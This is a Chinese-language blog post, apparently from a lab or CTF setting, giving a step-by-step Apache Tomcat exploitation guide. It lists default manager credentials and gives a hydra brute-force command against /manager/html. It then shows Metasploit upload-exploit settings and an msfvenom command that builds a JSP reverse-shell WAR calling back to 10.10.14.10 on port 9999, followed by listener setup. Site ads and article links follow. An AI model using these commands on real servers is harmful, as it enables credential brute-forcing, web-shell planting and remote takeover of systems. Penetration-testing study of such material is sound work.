Apache Tomcat 漏洞利用
参考链接1
参考链接2
通过对apache tomcat的枚举和利用,我们可以从中找出漏洞,然后得到shell
枚举
- 在 Tomcat6 之前的某些版本中,我们可以使用msf枚举用户:
| msf> use auxiliary/scanner/http/tomcat_enum |
-
常见的得到的用户名与密码是:
- admin:admin
- tomcat:tomcat
- admin: NOTHING
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat
-
当然,我们也可以使用hydra进行暴力破解
| hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html |
- 得到了用户名与密码后,我们就可以登录到 /manager/html下传输反向shell
RCE
| use exploit/multi/http/tomcat_mgr_upload |
| show options |
| set RHOSTS |
| set RPORT 8080 |
| set HttpPassword |
| set HttpUsername |
| set LHOST |
| exploit |
- 当我们使用msf没有用时,我们可以自己制造一个shell传输到网页上
- 创建一个msfvenom payload
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=9999 -f war -o rshell.war |
- 使用msf的监听模块进行监听(这有时候会收不到反弹回来的shell),或者使用nc监听端口
| use exploit/multi/handler |
| show options |
| set payload java/jsp_shell_reverse_tcp |
| set LHOST 10.10.14.10 |
| set LPORT 9999 |
| exploit |
- 完成这些后,我们将shell文件传输到web上,如果我们不能访问/manager/,那么就无法进行下一步
- 点击上传的文件在web中的地址,如果监听器没能收到shell,我们可以解压缩之前使用msfvenom创建的 .war 文件,将里面的 .jsp 文件上传,并且访问其网络链接
点击该文字链接,说的很全面,但是要按情况选择
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 单线程的Redis速度为什么快?
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 展开说说关于C#中ORM框架的用法!